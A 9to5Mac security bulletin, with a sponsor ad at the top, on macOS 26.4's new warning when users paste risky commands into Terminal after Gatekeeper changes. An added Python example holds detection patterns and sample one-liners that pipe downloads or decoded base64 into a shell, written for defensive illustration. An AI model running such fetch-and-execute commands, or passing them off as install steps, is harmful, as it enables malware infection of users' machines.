9to5Mac Security Bulletin is brought to you exclusively by Mosyle, the only Apple Unified Platform. Our job is to make Apple devices ready and secure for work. Our unique integrated approach to management and security combines the latest Apple-specific security solutions with fully automated Hardening & Compliance, Next Generation EDR, AI-powered Zero Trust, and the most powerful and modern Apple MDM. As a result, we currently provide a fully automated Apple Unified Platform trusted by over 45,000 organizations, effortlessly and cost-effectively preparing millions of Apple devices for work. Request your EMPOWERED TRIAL today and understand that Mosyle has everything you need to work with Apple.
With the release of macOS 26.4, Apple now warns users who try to paste malicious code into Terminal. The warning is a final blow against the new attack method that cybercriminals, now more desperate, have turned to.
With the release of macOS Sonoma in 2023, Apple dealt a significant blow to the methods malware uses to bypass the built-in protection mechanism of the Mac, Gatekeeper. The update no longer allows users to right-click and open malicious applications that are unsigned and unapproved by Apple.
This was a damaging change for cybercriminals who relied on this popular bypass method to infect Macs.
Cybercriminals quickly turned to a new social engineering tactic: tricking users into manually executing malicious commands in Terminal. You may have seen such attacks. I have also written about this topic many times in the Security Bulletin. A malicious application prompts the user to copy a command and paste it into Terminal.
This is a simple method but it works. And recently, it has been working a lot.
The attack actually succeeds in bypassing every layer of protection that Apple has integrated into macOS. Even Gatekeeper cannot protect you from yourself. The system sees this as a legitimate user action. You opened Terminal, pasted the command, and pressed Enter. From macOS's perspective, you intended to do this.
These attacks are typically carried out through malicious application downloads from fake websites, direct messages, and other distribution methods. Recently, I have encountered imitations of everything from OpenAI's Atlas browser to Google Chrome. The bar for carrying out such an attack is extremely low, which explains why it has become so attractive for threat actors who have lost the Gatekeeper bypass method.
But now Apple is trying to go further to protect users.
With macOS Tahoe 26.4, your Mac will now warn you when you paste Terminal commands copied from Safari or other applications and will flag anything that could harm your system. If macOS detects something suspicious, it will show a warning before executing the command, giving you a chance to stop and think before doing something irreversible.
Apple is once again going on the offensive here. It is a very small security change, but a useful step that will protect the users who need it the most. For someone with little Mac knowledge following instructions from a malicious download, this could be the difference between being safe and being compromised.
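To illustrate the kind of check that can run on pasted text before it reaches the shell, here is an added Python example; it is not Apple's implementation and not code from the original article. Apple has not published the criteria macOS 26.4 uses, so the rule set, the names `RULES` and `review_paste`, and the sample commands are all assumptions constructed for this example.

```python
import re

# Constructed heuristics for illustration only; the criteria macOS 26.4
# actually applies are not public, so every rule here is an assumption.
SHELL = r"(?:sudo\s+)?(?:ba|z|k)?sh\b"
RULES = [
    ("download piped to a shell",
     re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*" + SHELL)),
    ("decoded data piped to a shell",
     re.compile(r"\bbase64\b[^|]*\s(?:-d|-D|--decode)\b[^|]*\|\s*" + SHELL)),
    ("quarantine attribute removal",
     re.compile(r"\bxattr\b[^|;&]*\bcom\.apple\.quarantine\b")),
]


def review_paste(text):
    """Return the reasons a pasted string deserves a confirmation prompt."""
    reasons = [name for name, rx in RULES if rx.search(text)]
    # A newline inside the paste can submit a command before the user has
    # read it when the shell is not using bracketed paste.
    if "\n" in text or "\r" in text:
        reasons.append("embedded newline")
    return reasons


def should_warn(text):
    """True when at least one rule fires, i.e. the paste should be held."""
    return bool(review_paste(text))


if __name__ == "__main__":
    # Constructed samples; example.invalid is a reserved, non-resolving name.
    samples = [
        "curl -fsSL https://example.invalid/install.sh | bash",
        "echo Y29uc3RydWN0ZWQ= | base64 -D | sh",
        "curl -s https://example.invalid/f | shasum -a 256",
        "ls -la ~/Downloads",
    ]
    for s in samples:
        print(f"{'WARN' if should_warn(s) else 'ok  '} {s!r} {review_paste(s)}")
```

Pattern rules like these miss anything they do not name, so a check of this kind adds a pause for the user rather than replacing endpoint detection.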
Follow Arin Waichulis: LinkedIn, Threads, X